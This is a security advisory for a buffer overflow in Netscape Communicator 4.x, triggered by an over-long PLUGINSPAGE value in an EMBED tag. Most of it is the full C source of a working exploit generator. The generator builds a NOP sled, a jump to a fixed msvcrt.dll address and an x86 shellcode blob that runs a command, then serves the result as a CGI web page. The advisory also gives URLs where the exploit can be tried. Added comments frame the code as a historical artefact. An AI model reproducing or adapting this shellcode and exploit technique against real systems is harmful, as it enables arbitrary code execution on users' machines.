Netscape Communicator versions 4.06, 4.5, 4.6 and 4.61e are vulnerable to a buffer overflow when an over-long string is given in the PLUGINSPAGE attribute of an EMBED tag. This buffer overflow can be used to execute arbitrary code.
Credit:
This vulnerability and the exploit source code have been provided by: DEF CON ZERO WINDOW.
Because the payload jumps to fixed memory addresses (where certain msvcrt.dll functions reside), it does not work with an older version of msvcrt.dll; the expected msvcrt.dll version is 6.00.8397.
You can quickly test this exploit on the site of the person who found the vulnerability:
http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex.cgi and http://www.ugtop.com/defcon0/hc/nc4x_ex/nc4x_ex2.cgi
The following is the source code of the first exploit:
/************************************************************************/
/* Netscape communicator 4.06J - 4.6J, 4.61e Exploit for Windows98 */
/* */
/* written by R00t Zer0(defcon0@ugtop.com) */
/* */
/* DEF CON ZERO( http://www.ugtop.com/defcon0/index.htm) */
/************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include <sys/types.h>
#include <sys/stat.h>
/* Layout of the over-long PLUGINSPAGE value built in main() (see advisory text above). */
#define STACK_LEN ( 2135 )
/* length of the random filler placed in the TYPE= attribute */
#define EMBED_TYPE_LEN ( 150 )
/* offset at which main() stores the 4-byte address below; the name suggests a
 * handler slot, but nothing on this page confirms what sits there -- TODO confirm */
#define XPT_HDL_OFFSET ( 588 )
/* displacement byte of the two-byte short jump written just before that slot */
#define JMPS_OFFSET ( 6 )
/* Absolute addresses inside one specific msvcrt.dll build (6.00.8397 per the
 * advisory).  Any other build places these elsewhere and the exploit fails,
 * which is why address randomisation defeats payloads of this kind.
 * INT01H_ADDR is not referenced anywhere in main(). */
#define JMP_EBX_ADDR ( 0xbff7a06b )
#define INT01H_ADDR ( 0xbff73d30 )
/* x86 single-byte opcodes used when filling the buffer */
#define NOP_CODE ( 0x90 )
#define JMPS_CODE ( 0xeb )
/* text appended after the machine-code blob; what the blob does with it is not
 * shown on this page */
#define FUNCTION "msvcrt.dll.system.exit."
#define COMMAND "welcome.exe"
/* index inside win98_exec_code that main() overwrites with strlen( COMMAND ) */
#define CMDLENP ( 65 )
int
main( void )
{
/*
 * Writes a CGI response (Content-type header plus an HTML page) whose EMBED
 * tag carries the over-long PLUGINSPAGE attribute described in the advisory.
 * Historical artefact: it depends on fixed addresses in one msvcrt.dll build
 * and on Windows 98, so its value today is in illustrating the bug class
 * (an attribute value copied into a fixed-size buffer without a length check,
 * as the advisory describes) and the corresponding fix -- bound every copy.
 * Output goes to stdout; always returns 0.
 *
 * Portability note: u_char/u_long/u_int and bzero() come from <sys/types.h>
 * and BSD-style headers, not from standard C.
 */
/* opaque x86 machine code supplied by the author; not disassembled here.
 * The trailing 0x00 makes it a C string so strcat() below can append it. */
u_char win98_exec_code[100] = {
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,
0xF7,0xBF,0xFF,0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,0x83,0xC3,0x06,
0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF8,0x43,0x53,0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,0x33,0xC0,0x50,
0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,0xFF,0x00 };
/* the PLUGINSPAGE value: NOP fill, short jump, address, blob, strings */
u_char exploit_code[ STACK_LEN ];
/* random filler for TYPE=; note it is never NUL-terminated (see below) */
u_char embed_type[ EMBED_TYPE_LEN ];
u_long ip;
int loop;
srand( ( u_int )time( 0 ) );
/* zero the whole buffer, then overwrite the first XPT_HDL_OFFSET bytes with NOPs */
bzero( exploit_code, sizeof( exploit_code ) );
for( loop = 0; loop < XPT_HDL_OFFSET; loop++ )
exploit_code [loop ] = NOP_CODE;
/* make exploit code */
/* two-byte short jump (opcode, displacement) four bytes before the slot, then
 * the address stored least-significant byte first at XPT_HDL_OFFSET..+3 */
ip = JMP_EBX_ADDR;
exploit_code[ XPT_HDL_OFFSET - 4 ] = JMPS_CODE;
exploit_code[ XPT_HDL_OFFSET - 3 ] = JMPS_OFFSET;
exploit_code[ XPT_HDL_OFFSET + 3 ] = ( char)( 0xff & ( ip >> 24 ) );
exploit_code[ XPT_HDL_OFFSET + 2 ] = ( char)( 0xff & ( ip >> 16 ) );
exploit_code[ XPT_HDL_OFFSET + 1 ] = ( char)( 0xff & ( ip >> 8 ) );
exploit_code[ XPT_HDL_OFFSET + 0 ] = ( char)( 0xff & ( ip >> 0 ) );
/* patch strlen( COMMAND ) into the blob at index CMDLENP -- presumably a length
 * byte the code consumes at run time; not verified from this page */
win98_exec_code[ CMDLENP ] = strlen( COMMAND );
/* u_char arrays passed where strcat() expects char * (pointer-sign warnings on
 * modern compilers).  By inspection the result is roughly 700 bytes -- 592 bytes
 * up to and including the address, 82 bytes of blob, then the two strings --
 * so it stays well inside STACK_LEN. */
strcat( exploit_code, win98_exec_code );
strcat( exploit_code, FUNCTION );
strcat( exploit_code, COMMAND );
/* set random type */
/* printable bytes in 0x23..0x7f.  NOTE(review): no terminating NUL is ever
 * written, so the "%s" that prints embed_type below reads past the array --
 * undefined behaviour in this generator. */
for( loop = 0; loop < EMBED_TYPE_LEN; loop++ )
embed_type[ loop ] = 0x23 + ( rand() % 93 );
/* print html */
/* CGI header first, then the page; exploit_code is emitted raw (it contains
 * non-printable bytes) as the attribute value */
printf( "Content-type: text/html\n\n" );
printf( "<HTML>\n" );
printf( "<HEAD>\n" );
printf( " <TITLE>Netscape communicator 4.x Exploit!!</TITLE>\n" );
printf( "</HEAD>\n" );
printf( "<BODY>\n" );
printf( "<EMBED SRC=\"FreeUNYUN!\" PLUGINSPAGE=\"%s\" ", exploit_code );
printf( "TYPE=\"%s\" WIDTH=\"1500\" HEIGHT=\"1000\">\n", embed_type );
printf( "</EMBED>\n</BODY>\n</HTML>\n" );
return( 0 );
}